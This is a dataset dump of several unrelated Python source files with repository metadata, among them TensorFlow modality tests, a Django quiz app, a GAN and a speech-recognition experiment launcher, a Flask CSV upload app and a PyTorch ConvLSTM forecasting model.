      output = tf.concat(sharded_output, 0)
      session.run(tf.global_variables_initializer())
      res = session.run(output)
    self.assertEqual(res.shape, (batch_size, length, 1, hidden_size))

  def testSymbolModalityTargets(self):
    """top_sharded + loss_sharded: logits shape and scalar loss (unfactored)."""
    batch_size = 10
    num_datashards = 5
    length = 6
    height = 7
    hidden_size = 9
    vocab_size = 11
    model_hparams = common_hparams.basic_params1()
    model_hparams.hidden_size = hidden_size
    model_hparams.mode = tf.estimator.ModeKeys.TRAIN
    body_output = -1 + np.random.random_integers(
        100, size=(batch_size, length, height, hidden_size))
    targets = -1 + np.random.random_integers(
        vocab_size, size=(batch_size, length, height, 1))
    m = modalities.SymbolModality(model_hparams, vocab_size)
    data_parallelism = expert_utils.Parallelism(
        ["/device:CPU:0"] * num_datashards)
    with self.test_session() as session:
      sharded_body_output = tf.split(tf.to_float(body_output), num_datashards)
      sharded_targets = tf.split(targets, num_datashards)
      sharded_logits = m.top_sharded(sharded_body_output, sharded_targets,
                                     data_parallelism)
      train_loss = m.loss_sharded(sharded_logits, sharded_targets,
                                  data_parallelism)
      logits = tf.concat(sharded_logits, 0)
      session.run(tf.global_variables_initializer())
      res1, res2 = session.run((logits, train_loss))
    self.assertEqual(res1.shape, (batch_size, length, height, 1, vocab_size))
    self.assertEqual(res2.shape, ())

  def testSymbolModalityTargetsFactored(self):
    """Same as testSymbolModalityTargets but with factored_logits enabled."""
    batch_size = 10
    num_datashards = 5
    length = 6
    height = 7
    hidden_size = 9
    vocab_size = 11
    model_hparams = common_hparams.basic_params1()
    model_hparams.factored_logits = True
    model_hparams.hidden_size = hidden_size
    model_hparams.mode = tf.estimator.ModeKeys.TRAIN
    body_output = -1 + np.random.random_integers(
        100, size=(batch_size, length, height, hidden_size))
    targets = -1 + np.random.random_integers(
        vocab_size, size=(batch_size, length, height, 1))
    m = modalities.SymbolModality(model_hparams, vocab_size)
    data_parallelism = expert_utils.Parallelism(
        ["/device:CPU:0"] * num_datashards)
    with self.test_session() as session:
      sharded_body_output = tf.split(tf.to_float(body_output), num_datashards)
      sharded_targets = tf.split(targets, num_datashards)
      sharded_logits = m.top_sharded(sharded_body_output, sharded_targets,
                                     data_parallelism)
      train_loss = m.loss_sharded(sharded_logits, sharded_targets,
                                  data_parallelism)
      logits = tf.concat(sharded_logits, 0)
      session.run(tf.global_variables_initializer())
      res1, res2 = session.run((logits, train_loss))
    self.assertEqual(res1.shape, (batch_size, length, height, 1, vocab_size))
    self.assertEqual(res2.shape, ())
if __name__ == "__main__":
tf.test.main()
| true | true |
1c305f188374ce49ca2ce60915aa41c9f776411f | 1,145 | py | Python | game/views.py | nfielder/zero-score-game | 61433e4348cc6dbfbe137901da08f896cd2afa58 | [
"MIT"
] | null | null | null | game/views.py | nfielder/zero-score-game | 61433e4348cc6dbfbe137901da08f896cd2afa58 | [
"MIT"
] | 6 | 2021-03-19T07:21:06.000Z | 2021-09-23T06:22:05.000Z | game/views.py | nfielder/zero-score-game | 61433e4348cc6dbfbe137901da08f896cd2afa58 | [
"MIT"
] | null | null | null | from django.shortcuts import get_object_or_404, render
from django.http import HttpResponse
from django.views import generic
from .models import Quiz, Question, Answer
class IndexView(generic.ListView):
    """Landing page: lists every available quiz."""

    template_name = 'game/index.html'

    def get_queryset(self):
        """Return all quizzes."""
        return Quiz.objects.all()
class QuizView(generic.ListView):
    """Lists the questions that belong to a single quiz."""

    template_name = 'game/quiz.html'

    def get_queryset(self):
        """Return the questions of the quiz identified by the `pk` URL kwarg."""
        return Question.objects.filter(quiz=self.kwargs['pk'])
class QuestionView(generic.DetailView):
    """Detail page for a single question."""

    model = Question
    template_name = 'game/question.html'
def outcome(request, question_id):
    """Grade a submitted answer for a question and render the outcome page.

    Reads the player's answer from POST, compares it case-insensitively
    against the question's stored answers, and renders the score of the
    first match — or 'WRONG' when nothing matches.
    """
    question = get_object_or_404(Question, pk=question_id)
    inputted_answer = request.POST['answer'].lower()
    # Compare directly against the related answers instead of first building
    # a list of single-key dicts; same first-match semantics, no intermediate
    # allocations.
    for answer in question.answer_set.all():
        if answer.answer_text.lower() == inputted_answer:
            return render(request, 'game/outcome.html', {'score': answer.score})
    return render(request, 'game/outcome.html', {'score': 'WRONG'})
| 30.131579 | 86 | 0.699563 | from django.shortcuts import get_object_or_404, render
from django.http import HttpResponse
from django.views import generic
from .models import Quiz, Question, Answer
class IndexView(generic.ListView):
    """Landing page: lists every available quiz."""

    template_name = 'game/index.html'

    def get_queryset(self):
        """Return all quizzes."""
        return Quiz.objects.all()
class QuizView(generic.ListView):
    """Lists the questions that belong to a single quiz."""

    template_name = 'game/quiz.html'

    def get_queryset(self):
        """Return the questions of the quiz identified by the `pk` URL kwarg."""
        return Question.objects.filter(quiz=self.kwargs['pk'])
class QuestionView(generic.DetailView):
    """Detail page for a single question."""

    model = Question
    template_name = 'game/question.html'
def outcome(request, question_id):
    """Grade a submitted answer for a question and render the outcome page.

    Reads the player's answer from POST, compares it case-insensitively
    against the question's stored answers, and renders the score of the
    first match — or 'WRONG' when nothing matches.
    """
    question = get_object_or_404(Question, pk=question_id)
    inputted_answer = request.POST['answer'].lower()
    # Compare directly against the related answers instead of first building
    # a list of single-key dicts; same first-match semantics, no intermediate
    # allocations.
    for answer in question.answer_set.all():
        if answer.answer_text.lower() == inputted_answer:
            return render(request, 'game/outcome.html', {'score': answer.score})
    return render(request, 'game/outcome.html', {'score': 'WRONG'})
| true | true |
1c305f48451238b0c7e8bd931f7965ead76b5b64 | 163 | py | Python | bin/cubes/pentacubes-octagonal-frame-1.py | tiwo/puzzler | 7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e | [
"Intel"
] | null | null | null | bin/cubes/pentacubes-octagonal-frame-1.py | tiwo/puzzler | 7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e | [
"Intel"
] | null | null | null | bin/cubes/pentacubes-octagonal-frame-1.py | tiwo/puzzler | 7ad3d9a792f0635f7ec59ffa85fb46b54fd77a7e | [
"Intel"
] | 1 | 2022-01-02T16:54:14.000Z | 2022-01-02T16:54:14.000Z | #!/usr/bin/env python
# $Id$
"""many solutions"""
import puzzler
from puzzler.puzzles.pentacubes import PentacubesOctagonalFrame1 as puzzle
puzzler.run(puzzle)
| 16.3 | 74 | 0.773006 |
import puzzler
from puzzler.puzzles.pentacubes import PentacubesOctagonalFrame1 as puzzle
puzzler.run(puzzle)
| true | true |
1c3060cbc2ffeea68a73ad257f383f7121f03ac3 | 3,479 | py | Python | run/run_dpgan.py | vab10266/VaudsTextGans | 7b2e32b13cc4e03d12a0bd9753beee7c20c94d01 | [
"MIT"
] | null | null | null | run/run_dpgan.py | vab10266/VaudsTextGans | 7b2e32b13cc4e03d12a0bd9753beee7c20c94d01 | [
"MIT"
] | null | null | null | run/run_dpgan.py | vab10266/VaudsTextGans | 7b2e32b13cc4e03d12a0bd9753beee7c20c94d01 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# @Author : William
# @Project : TextGAN-william
# @FileName : run_seqgan.py
# @Time : Created at 2019-05-27
# @Blog : http://zhiweil.ml/
# @Description :
# Copyrights (C) 2018. All Rights Reserved.
import sys
from subprocess import call
import os
# Job id and gpu_id
# Parse positional CLI args: `python run_dpgan.py [job_id] [gpu_id]`.
if len(sys.argv) > 2:
    job_id = int(sys.argv[1])
    gpu_id = str(sys.argv[2])  # kept as a string; forwarded to '--device' below
    print('job_id: {}, gpu_id: {}'.format(job_id, gpu_id))
elif len(sys.argv) > 1:
    job_id = int(sys.argv[1])
    gpu_id = 0
    print('job_id: {}, missing gpu_id (use default {})'.format(job_id, gpu_id))
else:
    job_id = 0
    # NOTE(review): the no-argument default is gpu 2 while the one-argument
    # default is gpu 0 — looks unintentional; confirm which default is meant.
    gpu_id = 2
    print('Missing argument: job_id and gpu_id. Use default job_id: {}, gpu_id: {}'.format(job_id, gpu_id))
# Executables
executable = 'C:\\Users\\vauda\\anaconda3\\python.exe' # specify your own python interpreter path here
rootdir = '../'
scriptname = 'main.py'
# ===Program===
if_test = int(False)
run_model = 'dpgan'
CUDA = int(True)
oracle_pretrain = int(True)
gen_pretrain = int(False)
dis_pretrain = int(False)
MLE_train_epoch = 120
ADV_train_epoch = 200
tips = 'DPGAN experiments'
# ===Oracle or Real===
if_real_data = [int(False), int(True), int(True), int(True)]
dataset = ['oracle', 'image_coco', 'amazon_app_book', 'emnlp_news']
# One entry per dataset; real-data runs build their vocabulary from the corpus
# (hence 0). Fixed length: the original [5000, 0, 0] raised IndexError for
# job_id == 3 ('emnlp_news') since if_real_data/dataset have four entries.
vocab_size = [5000, 0, 0, 0]
# ===Basic Param===
data_shuffle = int(False)
model_type = 'vanilla'
gen_init = 'normal'
dis_init = 'uniform'
samples_num = 10000
batch_size = 64
max_seq_len = 20
gen_lr = 0.01
dis_lr = 0.01
pre_log_step = 10
adv_log_step = 1
# ===Generator===
ADV_g_step = 1
rollout_num = 16
gen_embed_dim = 32
gen_hidden_dim = 32
# ===Discriminator===
d_step = 5
d_epoch = 3
ADV_d_step = 4
ADV_d_epoch = 2
dis_embed_dim = 64
dis_hidden_dim = 64
# ===Metrics===
use_nll_oracle = int(True)
use_nll_gen = int(True)
use_nll_div = int(True)
use_bleu = int(True)
use_self_bleu = int(False)
use_ppl = int(False)
args = [
# Program
'--if_test', if_test,
'--run_model', run_model,
'--cuda', CUDA,
'--device', gpu_id, # comment for auto GPU
'--ora_pretrain', oracle_pretrain,
'--gen_pretrain', gen_pretrain,
'--dis_pretrain', dis_pretrain,
'--mle_epoch', MLE_train_epoch,
'--adv_epoch', ADV_train_epoch,
'--tips', tips,
# Oracle or Real
'--if_real_data', if_real_data[job_id],
'--dataset', dataset[job_id],
'--vocab_size', vocab_size[job_id],
# Basic Param
'--shuffle', data_shuffle,
'--model_type', model_type,
'--gen_init', gen_init,
'--dis_init', dis_init,
'--samples_num', samples_num,
'--batch_size', batch_size,
'--max_seq_len', max_seq_len,
'--gen_lr', gen_lr,
'--dis_lr', dis_lr,
'--pre_log_step', pre_log_step,
'--adv_log_step', adv_log_step,
# Generator
'--adv_g_step', ADV_g_step,
'--rollout_num', rollout_num,
'--gen_embed_dim', gen_embed_dim,
'--gen_hidden_dim', gen_hidden_dim,
# Discriminator
'--d_step', d_step,
'--d_epoch', d_epoch,
'--adv_d_step', ADV_d_step,
'--adv_d_epoch', ADV_d_epoch,
'--dis_embed_dim', dis_embed_dim,
'--dis_hidden_dim', dis_hidden_dim,
# Metrics
'--use_nll_oracle', use_nll_oracle,
'--use_nll_gen', use_nll_gen,
'--use_nll_div', use_nll_div,
'--use_bleu', use_bleu,
'--use_self_bleu', use_self_bleu,
'--use_ppl', use_ppl,
]
args = list(map(str, args))
my_env = os.environ.copy()
call([executable, scriptname] + args, env=my_env, cwd=rootdir)
| 24.5 | 107 | 0.649037 |
import sys
from subprocess import call
import os
if len(sys.argv) > 2:
job_id = int(sys.argv[1])
gpu_id = str(sys.argv[2])
print('job_id: {}, gpu_id: {}'.format(job_id, gpu_id))
elif len(sys.argv) > 1:
job_id = int(sys.argv[1])
gpu_id = 0
print('job_id: {}, missing gpu_id (use default {})'.format(job_id, gpu_id))
else:
job_id = 0
gpu_id = 2
print('Missing argument: job_id and gpu_id. Use default job_id: {}, gpu_id: {}'.format(job_id, gpu_id))
executable = 'C:\\Users\\vauda\\anaconda3\\python.exe'
rootdir = '../'
scriptname = 'main.py'
if_test = int(False)
run_model = 'dpgan'
CUDA = int(True)
oracle_pretrain = int(True)
gen_pretrain = int(False)
dis_pretrain = int(False)
MLE_train_epoch = 120
ADV_train_epoch = 200
tips = 'DPGAN experiments'
if_real_data = [int(False), int(True), int(True), int(True)]
dataset = ['oracle', 'image_coco', 'amazon_app_book', 'emnlp_news']
# One entry per dataset; real-data runs build their vocabulary from the corpus
# (hence 0). Fixed length: the original [5000, 0, 0] raised IndexError for
# job_id == 3 ('emnlp_news') since if_real_data/dataset have four entries.
vocab_size = [5000, 0, 0, 0]
data_shuffle = int(False)
model_type = 'vanilla'
gen_init = 'normal'
dis_init = 'uniform'
samples_num = 10000
batch_size = 64
max_seq_len = 20
gen_lr = 0.01
dis_lr = 0.01
pre_log_step = 10
adv_log_step = 1
ADV_g_step = 1
rollout_num = 16
gen_embed_dim = 32
gen_hidden_dim = 32
d_step = 5
d_epoch = 3
ADV_d_step = 4
ADV_d_epoch = 2
dis_embed_dim = 64
dis_hidden_dim = 64
use_nll_oracle = int(True)
use_nll_gen = int(True)
use_nll_div = int(True)
use_bleu = int(True)
use_self_bleu = int(False)
use_ppl = int(False)
args = [
'--if_test', if_test,
'--run_model', run_model,
'--cuda', CUDA,
'--device', gpu_id,
'--ora_pretrain', oracle_pretrain,
'--gen_pretrain', gen_pretrain,
'--dis_pretrain', dis_pretrain,
'--mle_epoch', MLE_train_epoch,
'--adv_epoch', ADV_train_epoch,
'--tips', tips,
'--if_real_data', if_real_data[job_id],
'--dataset', dataset[job_id],
'--vocab_size', vocab_size[job_id],
'--shuffle', data_shuffle,
'--model_type', model_type,
'--gen_init', gen_init,
'--dis_init', dis_init,
'--samples_num', samples_num,
'--batch_size', batch_size,
'--max_seq_len', max_seq_len,
'--gen_lr', gen_lr,
'--dis_lr', dis_lr,
'--pre_log_step', pre_log_step,
'--adv_log_step', adv_log_step,
'--adv_g_step', ADV_g_step,
'--rollout_num', rollout_num,
'--gen_embed_dim', gen_embed_dim,
'--gen_hidden_dim', gen_hidden_dim,
'--d_step', d_step,
'--d_epoch', d_epoch,
'--adv_d_step', ADV_d_step,
'--adv_d_epoch', ADV_d_epoch,
'--dis_embed_dim', dis_embed_dim,
'--dis_hidden_dim', dis_hidden_dim,
'--use_nll_oracle', use_nll_oracle,
'--use_nll_gen', use_nll_gen,
'--use_nll_div', use_nll_div,
'--use_bleu', use_bleu,
'--use_self_bleu', use_self_bleu,
'--use_ppl', use_ppl,
]
args = list(map(str, args))
my_env = os.environ.copy()
call([executable, scriptname] + args, env=my_env, cwd=rootdir)
| true | true |
1c30615b4a746379de40cc792bf7d00df1e3b945 | 4,068 | py | Python | examples/streaming_transducer/test_subword_streaming_transducer.py | Honghe/TensorFlowASR | ade78916987b6a61642b650cc10d259aeeb1d92e | [
"Apache-2.0"
] | 1 | 2020-10-20T11:42:08.000Z | 2020-10-20T11:42:08.000Z | examples/streaming_transducer/test_subword_streaming_transducer.py | dathudeptrai/TensorFlowASR | 72cd5d2b932d66ddd61e79ab41bb0d64cb8c4919 | [
"Apache-2.0"
] | null | null | null | examples/streaming_transducer/test_subword_streaming_transducer.py | dathudeptrai/TensorFlowASR | 72cd5d2b932d66ddd61e79ab41bb0d64cb8c4919 | [
"Apache-2.0"
] | 1 | 2021-10-16T22:40:42.000Z | 2021-10-16T22:40:42.000Z | # Copyright 2020 Huy Le Nguyen (@usimarit)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import argparse
from tensorflow_asr.utils import setup_environment, setup_devices
setup_environment()
import tensorflow as tf
DEFAULT_YAML = os.path.join(os.path.abspath(os.path.dirname(__file__)), "config.yml")
tf.keras.backend.clear_session()
# CLI for evaluating a subword streaming transducer. prog was "Conformer
# Testing" — a copy/paste leftover from the conformer example; fixed so that
# `--help` names this script correctly.
parser = argparse.ArgumentParser(prog="Streaming Transducer Testing")

parser.add_argument("--config", type=str, default=DEFAULT_YAML,
                    help="The file path of model configuration file")

parser.add_argument("--saved", type=str, default=None,
                    help="Path to saved model")

parser.add_argument("--tfrecords", default=False, action="store_true",
                    help="Whether to use tfrecords as dataset")

parser.add_argument("--mxp", default=False, action="store_true",
                    help="Enable mixed precision")

parser.add_argument("--device", type=int, default=0,
                    help="Device's id to run test on")

parser.add_argument("--cpu", default=False, action="store_true",
                    help="Whether to only use cpu")

parser.add_argument("--subwords", type=str, default=None,
                    help="Path to file that stores generated subwords")

parser.add_argument("--output_name", type=str, default="test",
                    help="Result filename name prefix")

args = parser.parse_args()
tf.config.optimizer.set_experimental_options({"auto_mixed_precision": args.mxp})
setup_devices([args.device], cpu=args.cpu)
from tensorflow_asr.configs.user_config import UserConfig
from tensorflow_asr.datasets.asr_dataset import ASRTFRecordDataset, ASRSliceDataset
from tensorflow_asr.featurizers.speech_featurizers import TFSpeechFeaturizer
from tensorflow_asr.featurizers.text_featurizers import SubwordFeaturizer
from tensorflow_asr.runners.base_runners import BaseTester
from tensorflow_asr.models.streaming_transducer import StreamingTransducer
config = UserConfig(DEFAULT_YAML, args.config, learning=True)
speech_featurizer = TFSpeechFeaturizer(config["speech_config"])
if args.subwords and os.path.exists(args.subwords):
print("Loading subwords ...")
text_featurizer = SubwordFeaturizer.load_from_file(config["decoder_config"], args.subwords)
else:
raise ValueError("subwords must be set")
tf.random.set_seed(0)
# Input validation must survive `python -O` (which strips `assert`), so fail
# with an explicit error instead of a bare assert.
if not args.saved:
    raise ValueError("--saved is required (path to the saved model weights)")
if args.tfrecords:
test_dataset = ASRTFRecordDataset(
data_paths=config["learning_config"]["dataset_config"]["test_paths"],
tfrecords_dir=config["learning_config"]["dataset_config"]["tfrecords_dir"],
speech_featurizer=speech_featurizer,
text_featurizer=text_featurizer,
stage="test", shuffle=False
)
else:
test_dataset = ASRSliceDataset(
data_paths=config["learning_config"]["dataset_config"]["test_paths"],
speech_featurizer=speech_featurizer,
text_featurizer=text_featurizer,
stage="test", shuffle=False
)
# build model
streaming_transducer = StreamingTransducer(
vocabulary_size=text_featurizer.num_classes,
**config["model_config"]
)
streaming_transducer._build(speech_featurizer.shape)
streaming_transducer.load_weights(args.saved, by_name=True)
streaming_transducer.summary(line_length=150)
streaming_transducer.add_featurizers(speech_featurizer, text_featurizer)
streaming_transducer_tester = BaseTester(
config=config["learning_config"]["running_config"],
output_name=args.output_name
)
streaming_transducer_tester.compile(streaming_transducer)
streaming_transducer_tester.run(test_dataset)
| 37.321101 | 95 | 0.753933 |
import os
import argparse
from tensorflow_asr.utils import setup_environment, setup_devices
setup_environment()
import tensorflow as tf
DEFAULT_YAML = os.path.join(os.path.abspath(os.path.dirname(__file__)), "config.yml")
tf.keras.backend.clear_session()
parser = argparse.ArgumentParser(prog="Conformer Testing")
parser.add_argument("--config", type=str, default=DEFAULT_YAML,
help="The file path of model configuration file")
parser.add_argument("--saved", type=str, default=None,
help="Path to saved model")
parser.add_argument("--tfrecords", default=False, action="store_true",
help="Whether to use tfrecords as dataset")
parser.add_argument("--mxp", default=False, action="store_true",
help="Enable mixed precision")
parser.add_argument("--device", type=int, default=0,
help="Device's id to run test on")
parser.add_argument("--cpu", default=False, action="store_true",
help="Whether to only use cpu")
parser.add_argument("--subwords", type=str, default=None,
help="Path to file that stores generated subwords")
parser.add_argument("--output_name", type=str, default="test",
help="Result filename name prefix")
args = parser.parse_args()
tf.config.optimizer.set_experimental_options({"auto_mixed_precision": args.mxp})
setup_devices([args.device], cpu=args.cpu)
from tensorflow_asr.configs.user_config import UserConfig
from tensorflow_asr.datasets.asr_dataset import ASRTFRecordDataset, ASRSliceDataset
from tensorflow_asr.featurizers.speech_featurizers import TFSpeechFeaturizer
from tensorflow_asr.featurizers.text_featurizers import SubwordFeaturizer
from tensorflow_asr.runners.base_runners import BaseTester
from tensorflow_asr.models.streaming_transducer import StreamingTransducer
config = UserConfig(DEFAULT_YAML, args.config, learning=True)
speech_featurizer = TFSpeechFeaturizer(config["speech_config"])
if args.subwords and os.path.exists(args.subwords):
print("Loading subwords ...")
text_featurizer = SubwordFeaturizer.load_from_file(config["decoder_config"], args.subwords)
else:
raise ValueError("subwords must be set")
tf.random.set_seed(0)
assert args.saved
if args.tfrecords:
test_dataset = ASRTFRecordDataset(
data_paths=config["learning_config"]["dataset_config"]["test_paths"],
tfrecords_dir=config["learning_config"]["dataset_config"]["tfrecords_dir"],
speech_featurizer=speech_featurizer,
text_featurizer=text_featurizer,
stage="test", shuffle=False
)
else:
test_dataset = ASRSliceDataset(
data_paths=config["learning_config"]["dataset_config"]["test_paths"],
speech_featurizer=speech_featurizer,
text_featurizer=text_featurizer,
stage="test", shuffle=False
)
# build model
streaming_transducer = StreamingTransducer(
vocabulary_size=text_featurizer.num_classes,
**config["model_config"]
)
streaming_transducer._build(speech_featurizer.shape)
streaming_transducer.load_weights(args.saved, by_name=True)
streaming_transducer.summary(line_length=150)
streaming_transducer.add_featurizers(speech_featurizer, text_featurizer)
streaming_transducer_tester = BaseTester(
config=config["learning_config"]["running_config"],
output_name=args.output_name
)
streaming_transducer_tester.compile(streaming_transducer)
streaming_transducer_tester.run(test_dataset)
| true | true |
1c306167ab64945efeb97233d525330dcef2b1e6 | 851 | py | Python | more.py | salisu14/python-tut | 4defc38924e064657daa46647e8979cde733f9f4 | [
"MIT"
] | 5 | 2021-04-16T01:29:21.000Z | 2021-12-24T10:03:54.000Z | more.py | salisu14/python-tut | 4defc38924e064657daa46647e8979cde733f9f4 | [
"MIT"
] | null | null | null | more.py | salisu14/python-tut | 4defc38924e064657daa46647e8979cde733f9f4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import threading
from datetime import date
from datetime import time
from datetime import datetime
# for i in range(65, 91):
# print(f'{chr(i)} = {i}')
# letters = ['A', 'B', 'C']
# for l in letters:
# print(f'{l} = {ord(l)}')
# alpha = [x for x in range(65, 91)]
# for a in alpha:
# print(f'{a} - {chr(a)}')
def gfg():
print('Welcome to timer')
timer = threading.Timer(10000.0, gfg)
timer.start()
print('.', end='')
print("Cancelling timer\n")
timer.cancel()
print('Exit\n')
try:
date_str = input('Enter birth date (MM/DD/YYYY): ')
birthdate = datetime.strptime(date_str, "%m/%d/%Y")
print("Date of birth:", birthdate)
print(birthdate.strftime("Date of birth details: %a, %d %B %Y"))
except ValueError as ve:
print('Invalid date format, please use %m/%d/%Y date format')
| 17.367347 | 68 | 0.615746 |
import threading
from datetime import date
from datetime import time
from datetime import datetime
def gfg():
print('Welcome to timer')
timer = threading.Timer(10000.0, gfg)
timer.start()
print('.', end='')
print("Cancelling timer\n")
timer.cancel()
print('Exit\n')
try:
date_str = input('Enter birth date (MM/DD/YYYY): ')
birthdate = datetime.strptime(date_str, "%m/%d/%Y")
print("Date of birth:", birthdate)
print(birthdate.strftime("Date of birth details: %a, %d %B %Y"))
except ValueError as ve:
print('Invalid date format, please use %m/%d/%Y date format')
| true | true |
1c3061b7d89899b458899d56cf3afd2c5976e3f7 | 858 | py | Python | flaskapp/app.py | zbouslama/open_maps | 26f0c8e64cf9fe28e24a05fae5c10cb3de38cf54 | [
"MIT"
] | null | null | null | flaskapp/app.py | zbouslama/open_maps | 26f0c8e64cf9fe28e24a05fae5c10cb3de38cf54 | [
"MIT"
] | 3 | 2018-05-07T21:28:40.000Z | 2018-05-07T21:31:23.000Z | flaskapp/app.py | zbouslama/open_maps | 26f0c8e64cf9fe28e24a05fae5c10cb3de38cf54 | [
"MIT"
] | 4 | 2018-04-20T10:14:10.000Z | 2018-05-11T12:59:16.000Z | from flask import Flask, render_template,request, jsonify
from data import Articles
import pandas as pd
app = Flask (__name__)
Articles= Articles()
@app.route('/')
def index():
return render_template ('home.html')
@app.route('/about')
def about ():
return render_template ('about.html')
@app.route('/articles')
def articles ():
return render_template ('articles.html', articles= Articles)
@app.route("/upload", methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
print(request.files['file'])
f = request.files['file']
data_csv = pd.read_csv(f)
return data_csv.to_html(), data_csv.to_csv("./data/data.csv")
return render_template('upload.html')
@app.route("/export", methods=['GET'])
def export_records():
return
if __name__ == '__main__' :
app.run(debug= True)
| 20.428571 | 69 | 0.659674 | from flask import Flask, render_template,request, jsonify
from data import Articles
import pandas as pd
app = Flask (__name__)
Articles= Articles()
@app.route('/')
def index():
return render_template ('home.html')
@app.route('/about')
def about ():
return render_template ('about.html')
@app.route('/articles')
def articles ():
return render_template ('articles.html', articles= Articles)
@app.route("/upload", methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
print(request.files['file'])
f = request.files['file']
data_csv = pd.read_csv(f)
return data_csv.to_html(), data_csv.to_csv("./data/data.csv")
return render_template('upload.html')
@app.route("/export", methods=['GET'])
def export_records():
return
if __name__ == '__main__' :
app.run(debug= True)
| true | true |
1c30629c59327e19ebbf9c332c541f043500aef2 | 8,776 | py | Python | satflow/models/conv_lstm.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | [
"MIT"
] | null | null | null | satflow/models/conv_lstm.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | [
"MIT"
] | null | null | null | satflow/models/conv_lstm.py | mfrasco/satflow | 2e56b46dfd81a05670c6d2b1bda8c9eec38301a7 | [
"MIT"
] | null | null | null | from typing import Any, Dict, Union
import pytorch_lightning as pl
import torch
import torch.nn as nn
import numpy as np
from nowcasting_utils.models.base import register_model
from nowcasting_utils.models.loss import get_loss
from satflow.models.layers.ConvLSTM import ConvLSTMCell
import torchvision
@register_model
class EncoderDecoderConvLSTM(pl.LightningModule):
def __init__(
self,
hidden_dim: int = 64,
input_channels: int = 12,
out_channels: int = 1,
forecast_steps: int = 48,
lr: float = 0.001,
visualize: bool = False,
loss: Union[str, torch.nn.Module] = "mse",
pretrained: bool = False,
conv_type: str = "standard",
):
super(EncoderDecoderConvLSTM, self).__init__()
self.forecast_steps = forecast_steps
self.criterion = get_loss(loss)
self.lr = lr
self.visualize = visualize
self.model = ConvLSTM(input_channels, hidden_dim, out_channels, conv_type=conv_type)
self.save_hyperparameters()
@classmethod
def from_config(cls, config):
return EncoderDecoderConvLSTM(
hidden_dim=config.get("num_hidden", 64),
input_channels=config.get("in_channels", 12),
out_channels=config.get("out_channels", 1),
forecast_steps=config.get("forecast_steps", 1),
lr=config.get("lr", 0.001),
)
def forward(self, x, future_seq=0, hidden_state=None):
return self.model.forward(x, future_seq, hidden_state)
def configure_optimizers(self):
# DeepSpeedCPUAdam provides 5x to 7x speedup over torch.optim.adam(w)
# optimizer = torch.optim.adam()
return torch.optim.Adam(self.parameters(), lr=self.lr)
def training_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
y_hat = torch.permute(y_hat, dims=(0, 2, 1, 3, 4))
# Generally only care about the center x crop, so the model can take into account the clouds in the area without
# being penalized for that, but for now, just do general MSE loss, also only care about first 12 channels
# the logger you used (in this case tensorboard)
# if self.visualize:
# if np.random.random() < 0.01:
# self.visualize_step(x, y, y_hat, batch_idx)
loss = self.criterion(y_hat, y)
self.log("train/loss", loss, on_step=True)
frame_loss_dict = {}
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"train/frame_{f}_loss"] = frame_loss
self.log_dict(frame_loss_dict, on_step=False, on_epoch=True)
return loss
def validation_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
y_hat = torch.permute(y_hat, dims=(0, 2, 1, 3, 4))
val_loss = self.criterion(y_hat, y)
# Save out loss per frame as well
frame_loss_dict = {}
# y_hat = torch.moveaxis(y_hat, 2, 1)
for f in range(self.forecast_steps):
frame_loss = self.criterion(y_hat[:, f, :, :, :], y[:, f, :, :, :]).item()
frame_loss_dict[f"val/frame_{f}_loss"] = frame_loss
self.log("val/loss", val_loss, on_step=True, on_epoch=True)
self.log_dict(frame_loss_dict, on_step=False, on_epoch=True)
return val_loss
def test_step(self, batch, batch_idx):
x, y = batch
y_hat = self(x, self.forecast_steps)
loss = self.criterion(y_hat, y)
return loss
def visualize_step(self, x, y, y_hat, batch_idx, step="train"):
tensorboard = self.logger.experiment[0]
# Add all the different timesteps for a single prediction, 0.1% of the time
if len(x.shape) == 5:
# Timesteps per channel
images = x[0].cpu().detach()
for i, t in enumerate(images): # Now would be (C, H, W)
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.input_channels)
tensorboard.add_image(
f"{step}/Input_Image_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
images = y[0].cpu().detach()
for i, t in enumerate(images): # Now would be (C, H, W)
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.output_channels)
tensorboard.add_image(
f"{step}/Target_Image_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
images = y_hat[0].cpu().detach()
for i, t in enumerate(images): # Now would be (C, H, W)
t = [torch.unsqueeze(img, dim=0) for img in t]
image_grid = torchvision.utils.make_grid(t, nrow=self.output_channels)
tensorboard.add_image(
f"{step}/Generated_Stack_Frame_{i}", image_grid, global_step=batch_idx
)
class ConvLSTM(torch.nn.Module):
def __init__(self, input_channels, hidden_dim, out_channels, conv_type: str = "standard"):
super().__init__()
""" ARCHITECTURE
# Encoder (ConvLSTM)
# Encoder Vector (final hidden state of encoder)
# Decoder (ConvLSTM) - takes Encoder Vector as input
# Decoder (3D CNN) - produces regression predictions for our model
"""
self.encoder_1_convlstm = ConvLSTMCell(
input_dim=input_channels,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.encoder_2_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True,
conv_type=conv_type,
)
self.decoder_1_convlstm = ConvLSTMCell(
input_dim=hidden_dim,
hidden_dim=hidden_dim,
kernel_size=(3, 3),
bias=True, # nf + 1
conv_type=conv_type,
)
